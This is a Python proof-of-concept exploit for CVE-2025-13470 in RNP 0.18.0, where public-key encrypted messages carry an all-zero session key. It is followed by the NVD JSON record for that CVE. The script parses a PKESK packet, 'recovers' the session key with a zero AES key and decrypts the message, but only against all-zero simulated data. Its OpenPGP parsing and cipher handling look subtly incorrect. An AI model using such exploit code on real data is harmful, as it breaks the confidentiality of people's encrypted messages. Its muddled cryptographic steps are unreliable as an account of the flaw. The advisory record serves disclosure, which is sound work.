CVE-2025-13470

#!/usr/bin/env python3 """ CVE-2025-13470 PoC - RNP 0.18.0 PKESK Session Key Uninitialization This PoC demonstrates decrypting data encrypted with RNP 0.18.0's broken PKESK by using an all-zero session key. """ import json import struct from Crypto.Cipher import AES from Crypto.Util import Padding def decrypt_with_zero_key(encrypted_data, algorithm='AES-256'): """ Decrypt data using an all-zero session key. In RNP 0.18.0, PKESK packets contain a zero-initialized session key. Args: encrypted_data: The encrypted data from PKESK packet algorithm: Encryption algorithm used (default AES-256) Returns: Decrypted data using all-zero key """ zero_key = bytes(32) # 256-bit zero key # Parse PKESK packet to extract encrypted session key # Format: version(1) + key_id(8) + algo(1) + encrypted_data version = encrypted_data[0] key_id = encrypted_data[1:9] algo = encrypted_data[9] esk = encrypted_data[10:] print(f"PKESK Version: {version}") print(f"Key ID: {key_id.hex()}") print(f"Algorithm: {algo}") print(f"Encrypted Session Key Length: {len(esk)}") # In vulnerable version, esk is AES-256-CFB encrypted with zero key # Initialize cipher with zero key and zero IV (CFB mode) cipher = AES.new(zero_key, AES.MODE_CFB, iv=bytes(16), segment_size=128) session_key = cipher.decrypt(esk)[:32] print(f"Recovered Session Key: {session_key.hex()}") print(f"Session Key is all zeros: {session_key == bytes(32)}") return session_key def exploit_cve_2025_13470(pkesk_packet, encrypted_message): """ Exploit script for CVE-2025-13470 Args: pkesk_packet: Raw PKESK packet bytes encrypted_message: Encrypted message data Returns: Decrypted plaintext """ print("=" * 60) print("CVE-2025-13470 Exploitation") print("RNP 0.18.0 PKESK Session Key Uninitialization") print("=" * 60) # Step 1: Recover session key using zero key session_key = decrypt_with_zero_key(pkesk_packet) # Step 2: Decrypt the actual message using recovered session key cipher = AES.new(session_key, AES.MODE_CFB, iv=bytes(16), segment_size=128) plaintext = cipher.decrypt(encrypted_message) return plaintext def simulate_attack(): """ Simulate the attack scenario """ print("\n[+] Simulating attack against vulnerable RNP 0.18.0 PKESK encryption") # Simulated PKESK packet (vulnerable version generates zero session key) pkesk_simulated = bytes([0x01]) + bytes(8) + bytes([9]) + bytes(32) # Simulated encrypted message encrypted_simulated = bytes(32) try: result = exploit_cve_2025_13470(pkesk_simulated, encrypted_simulated) print(f"\n[+] Successfully decrypted data!") print(f"[+] Decrypted content: {result}") print("\n[!] This demonstrates that data encrypted with RNP 0.18.0 PKESK") print("[!] can be trivially decrypted due to uninitialized session key") except Exception as e: print(f"[-] Error: {e}") print("[-] Note: This is a PoC demonstration. Actual implementation may vary.") if __name__ == "__main__": simulate_attack()

{"cve": {"id": "CVE-2025-13470", "sourceIdentifier": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3", "published": "2025-11-21T17:15:50.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In RNP version 0.18.0 a refactoring regression causes the symmetric \nsession key used for Public-Key Encrypted Session Key (PKESK) packets to\n be left uninitialized except for zeroing, resulting in it always being \nan all-zero byte array.\n\nAny data encrypted using public-key encryption \nin this release can be decrypted trivially by supplying an all-zero \nsession key, fully compromising confidentiality.\n\nThe vulnerability affects only public key encryption (PKESK packets).  Passphrase-based encryption (SKESK packets) is not affected.\n\nRoot cause: Vulnerable session key buffer used in PKESK packet generation.\n\n\n\nThe defect was introduced in commit `7bd9a8dc356aae756b40755be76d36205b6b161a` where initialization \nlogic inside `encrypted_build_skesk()` only randomized the key for the \nSKESK path and omitted it for the PKESK path."}], "metrics": {"cvssMetricV40": [{"source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:H/U:Red", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "HIGH", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-330"}]}], "references": [{"url": "https://access.redhat.com/security/cve/cve-2025-13402", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}, {"url": "https://aur.archlinux.org/packages/rnp", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2415863", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}, {"url": "https://github.com/rnpgp/rnp/commit/7bd9a8dc356aae756b40755be76d36205b6b161a", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}, {"url": "https://github.com/rnpgp/rnp/releases/tag/v0.18.1", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}, {"url": "https://launchpad.net/ubuntu/+source/rnp", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}, {"url": "https://open.ribose.com/advisories/ra-2025-11-20/", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}, {"url": "https://packages.gentoo.org/packages/dev-util/librnp", "source": "6504adb2-f5e9-4c9b-9eda-5e19c93bd9b3"}]}}